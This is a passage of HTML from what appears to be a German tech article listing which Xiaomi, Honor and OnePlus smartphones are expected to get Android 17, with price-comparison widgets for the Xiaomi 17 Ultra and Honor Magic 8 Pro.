<li>13T /<a href="https://www.pcwelt.de/article/2086566/xiaomi-13t-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a></li>



<li><a href="https://www.pcwelt.de/article/3060842/xiaomi-redmi-note-15-5g-test.html" target="_blank" rel="noreferrer noopener">Redmi Note 15</a> / <a href="https://www.pcwelt.de/article/3029932/xiaomi-redmi-note-15-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3044182/xiaomi-redmi-note-15-pro-plus-5g-test.html" target="_blank" rel="noreferrer noopener">Pro+</a></li>



<li>Redmi Note 14 / Pro / Pro+</li>



<li>Poco X8 / Pro / <a href="https://www.pcwelt.de/article/3105908/tpoco-x8-pro-max-test.html" target="_blank" rel="noreferrer noopener">Pro Max</a></li>



<li>Poco F8 / <a href="https://www.pcwelt.de/article/3012838/poco-f8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3012817/xiaomi-poco-f8-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li>Poco M8 / <a href="https://www.pcwelt.de/article/3072287/poco-m8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco X7 / <a href="https://www.pcwelt.de/article/2573751/xiaomi-poco-x7-pro-amazon-angebot-early-bird-rabatt.html" target="_blank" rel="noreferrer noopener">Pro</a> </li>



<li><a href="https://www.pcwelt.de/article/2828306/xiaomi-poco-f7-test.html" target="_blank" rel="noreferrer noopener">Poco F7</a> / <a href="https://www.pcwelt.de/article/2653239/poco-f7-pro-martphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco F6 / <a href="https://www.pcwelt.de/article/2356099/das-poco-f6-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco M7 / Pro</li>



<li>Mix Fold 4</li>



<li>Mix Flip </li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr:</strong> Xiaomi 13 Lite, 13 Pro, Redmi K60 Ultra, Redmi K70 Ultra, Redmi Turbo 3, Poco X6, X6 Pro, X6 5G, Poco M6 Plus, Mix Fold 3.</p>



<p><strong>Xiaomi 17 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.199,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0h08pt9HlV5RDMrEUYsO-lVt6WZAp33ccj8LRWpNbpJ1g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0h08pt9HlV5RDMrEUYsO-lVt6WZAp33ccj8LRWpNbpJ1g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.199,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 1.199,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.247,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=CE4-EOATIVXvsU1Wdh-mdc5Hd99OQeF7Tua2_ym3ZK91UStZgafXokrhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=CE4-EOATIVXvsU1Wdh-mdc5Hd99OQeF7Tua2_ym3ZK91UStZgafXokrhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.247,90 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.247,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.249,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PdaPEYhCDIGgFdiMIpCMzMRUV2gUzsRVRq5LL3gM66IWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=PdaPEYhCDIGgFdiMIpCMzMRUV2gUzsRVRq5LL3gM66IWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.249,00 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 1.249,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260618&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/xiaomi-logo.svg" alt="Xiaomi" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-price="1.499,90 €" data-vars-product-vendor="Xiaomi" aria-label="Deal anschauen bei Xiaomi für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Honor</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf22880"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/IMG_9620.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Honor Magic V6" class="wp-image-3077615" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Hall / Foundry</p></div>



<p>Honor ist ebenfalls einer der Hersteller, die länger Android-Updates an ihre Geräte ausliefern. Bis zu sieben Jahre ist der Update-Zyklus hier, was aber vor allem für Flaggschiff-Modelle gilt.</p>



<p>Diese Honor-Smartphones bekommen wahrscheinlich das Update auf Android 17:</p>



<p><strong>Sollten auch Android 17 bekommen:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3143704/honor-600-test.html" target="_blank" rel="noreferrer noopener">600</a> / Pro</li>



<li>Magic 8 / <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3011397/honor-magic-8-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V6</li>



<li><a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Magic V5</a></li>



<li><a href="https://www.pcwelt.de/article/2795141/honor-400-smartphone-test.html" target="_blank" rel="noreferrer noopener">400</a> / <a href="https://www.pcwelt.de/article/2801931/honor-400-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>200 / <a href="https://www.pcwelt.de/article/2379154/honor-200-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro </a>/ Lite / Smart</li>



<li>Magic 6 / <a href="https://www.pcwelt.de/article/2286476/das-honor-magic-6-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Magic 7 / Pro / <a href="https://www.pcwelt.de/article/2602028/honor-magic-7-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V Flip</li>
</ul>



<p><strong>Voraussichtlich kein Android 17: </strong>Magic 5, Magic 5 Pro, Magic V2, Magic V3, Magic VS, X50 Pro, X60 Pro, Honor 90, Honor 90 Lite.</p>



<p><strong>Honor Magic 8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>911,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="911,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 911,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>959,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=emLWPA3QkqHVf28VzW0Dp4eF8ZBoGX1q43uwnXRmpCO1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7d8aHoW5lcFmzxoehbmVwWbKw998ZOg0dtKtd1xoDTY_s2z-lQR9LS5fJy4HCy7jhQJO-b31T0VW8&amp;mid=685895214583&amp;id=685895214583&amp;ts=20260618&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=emLWPA3QkqHVf28VzW0Dp4eF8ZBoGX1q43uwnXRmpCO1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7d8aHoW5lcFmzxoehbmVwWbKw998ZOg0dtKtd1xoDTY_s2z-lQR9LS5fJy4HCy7jhQJO-b31T0VW8&amp;mid=685895214583&amp;id=685895214583&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="959,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 959,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>986,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vendor-api="shopping24" data-vars-product-price="986,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 986,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>986,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=caP71K0dy6LgFdiMIpCMzNuzbPmHXZ_CkbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260618&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=caP71K0dy6LgFdiMIpCMzNuzbPmHXZ_CkbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="986,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 986,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260618&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/honor-logo.svg" alt="Honor" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-price="1.299,90 €" data-vars-product-vendor="Honor" aria-label="Deal anschauen bei Honor für 1.299,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">OnePlus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf27de8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/OnePlus-15T-green.jpg?quality=50&amp;strip=all&amp;w=1200" alt="OnePlus 15T green" class="wp-image-3084428" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnePlus</p></div>



<p>Der chinesische Hersteller OnePlus gibt für die meisten seiner Geräte recht eindeutige Update-Versprechen. Ältere Modelle fallen dennoch aus dem Update-Zyklus.</p>



<p>Diese Oneplus-Smartphones sollten auch Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a></li>



<li><a href="https://www.pcwelt.de/article/3033893/oneplus-15r-test.html" target="_blank" rel="noreferrer noopener">OnePlus 15R</a></li>



